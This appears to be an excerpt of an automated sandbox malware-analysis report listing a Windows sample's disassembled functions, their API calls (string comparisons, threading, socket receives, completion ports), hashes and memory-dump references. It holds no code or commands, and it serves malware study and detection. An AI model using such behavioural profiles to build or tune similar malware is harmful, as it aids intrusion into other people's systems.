                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$Decrement$ExchangeTime$QuerySecondsSince1980Systemclosesocketsetsockopt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 671207744-0
                                                                                                                                                                                                      • Opcode ID: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction ID: f2cbb4ded8662be063e38a6044f3a63d93470e371ff4fbf655dea468244fd3f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dc138b45ca20bf30cfdef2e37b67658010477f0f0075654919bb451a9b4aa4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F51B075608702ABC704DF29D888B9BFBE5BF88314F40862EF85D93360D774A545CB96
                                                                                                                                                                                                      Function 0040ECC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction ID: 03739fb7cbf0ac8b4f24cf275543a684364e3b5b0ef8f18e7a9da7a5ef98527e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9e600dac57c6bff42fbd44a0ab5cbd0dab53693824f3ca44f5ffdbb74c8a893
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A413A75A0020ADFCB04DF99D884BAFB7B5FF48304F108969E505A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction ID: 010777473a756836e58c8d4bedbd534eac8e5d19c37eb4cb5fbe46cee8795b1d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f17999700f738b1f8b02f544927b29f5482ea2caa1df498b33a2fd0fcdce1b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F416A74A0020ADFDB04CF99C884BAFB7B9BF48304F108969E505B7390D779AE81CB95
                                                                                                                                                                                                      Function 004022C0 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,004019BB,00000000), ref: 004022DA
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,004019BB,00000000), ref: 004022FE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3168844106-0
                                                                                                                                                                                                      • Opcode ID: f026b787823f1fefae13d68ad76e75e92e04a5364415cb1f746f57a7895214dd
                                                                                                                                                                                                      • Instruction ID: a453b5b0d0ea6fd4c501cc83d62b7a74cd48d0bc9ee55fa6e36116878b1ddbe7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f026b787823f1fefae13d68ad76e75e92e04a5364415cb1f746f57a7895214dd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D231D1722012059BC710AFB5ED8CAE7B7A8FB44314F04863EE55AD3280DB78A4449BA9
                                                                                                                                                                                                      Function 0040ED01 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,device), ref: 0040ED7C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EDCB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDDF
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EDF7
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: device$deviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3511266565
                                                                                                                                                                                                      • Opcode ID: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction ID: 82367b585ef85f09a19fbcbd702cec43aacbd83c2379c0e5ae25b899a50ddae9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6fd2f803c2933f412baf75b0cc734dbcdbc8a3f85456721b664ef36854a057b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1313970A0020ADFCB14CF99D884BEFB7B5FF88304F108969E514A7390D778AA91CB95
                                                                                                                                                                                                      Function 0040EBA1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,service), ref: 0040EC1C
                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040EC6B
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC7F
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040EC97
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                      • String ID: service$serviceType
                                                                                                                                                                                                      • API String ID: 1602765415-3667235276
                                                                                                                                                                                                      • Opcode ID: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction ID: b0af1682f63206834f838cc0e71cdea1734b5e967c65deefb948a4066f0743c7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fbd28e8abd5f6cdc19dfc357c6f3e47e72171285df1c210c36e8075dc31c5cfb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09312874A0420A9FDB04CF99C884BEFB7B5BF48304F108969E615B7390D779AA81CB95
                                                                                                                                                                                                      Function 00407720 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3488799664-0
                                                                                                                                                                                                      • Opcode ID: 37ea556368018ed224677055f20a6db6f5d4f480788f3e6807c6e2582d8e890c
                                                                                                                                                                                                      • Instruction ID: d526f444081091d18ff5343ef40ffd9a09f2c1e6f6858c3ecb06089bc02b22b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37ea556368018ed224677055f20a6db6f5d4f480788f3e6807c6e2582d8e890c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21A479E00208FBC704DF60D885AAE7B31AB45304F10C47AE9026B381D679BA80CB56
                                                                                                                                                                                                      Function 00409860 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl_aullshr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 673498613-0
                                                                                                                                                                                                      • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                                      Function 0040DE90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(02E70634), ref: 0040DEA9
                                                                                                                                                                                                      • CloseHandle.KERNEL32(02E70638), ref: 0040DED8
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(02E70634), ref: 0040DEE7
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(02E70634), ref: 0040DEF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3102160386-3424199868
                                                                                                                                                                                                      • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                                      Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401346
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 00401352
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DFDD,00000000), ref: 0040135C
                                                                                                                                                                                                        • Part of subcall function 0040AB60: HeapFree.KERNEL32(02E70000,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                      • String ID: pdu$.Wu
                                                                                                                                                                                                      • API String ID: 309973729-3067427362
                                                                                                                                                                                                      • Opcode ID: 5b030ae644c6dbc9ea9d97babe0c3ba4c899ce10d031904438c25fa37c6040b2
                                                                                                                                                                                                      • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b030ae644c6dbc9ea9d97babe0c3ba4c899ce10d031904438c25fa37c6040b2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                                      Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                        • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                        • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                        • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3966618661-0
                                                                                                                                                                                                      • Opcode ID: 491eb203a0c6402b031db6bffc66d55fae6273400cfd7448ee54caaea6ad20ee
                                                                                                                                                                                                      • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 491eb203a0c6402b031db6bffc66d55fae6273400cfd7448ee54caaea6ad20ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                                      Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 435966717-0
                                                                                                                                                                                                      • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                                      Function 004076C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 2064604595-3424199868
                                                                                                                                                                                                      • Opcode ID: 69a3062be9f96e8746b97fe22f816949e30cab75ecd54b1de59a1ef8a98444b9
                                                                                                                                                                                                      • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69a3062be9f96e8746b97fe22f816949e30cab75ecd54b1de59a1ef8a98444b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                                      Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                      • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2074799992-0
                                                                                                                                                                                                      • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                      Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,00401FD3,00000000), ref: 00401C90
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,?,00401FD3,00000000), ref: 00401CA6
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3668019968-0
                                                                                                                                                                                                      • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                      • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
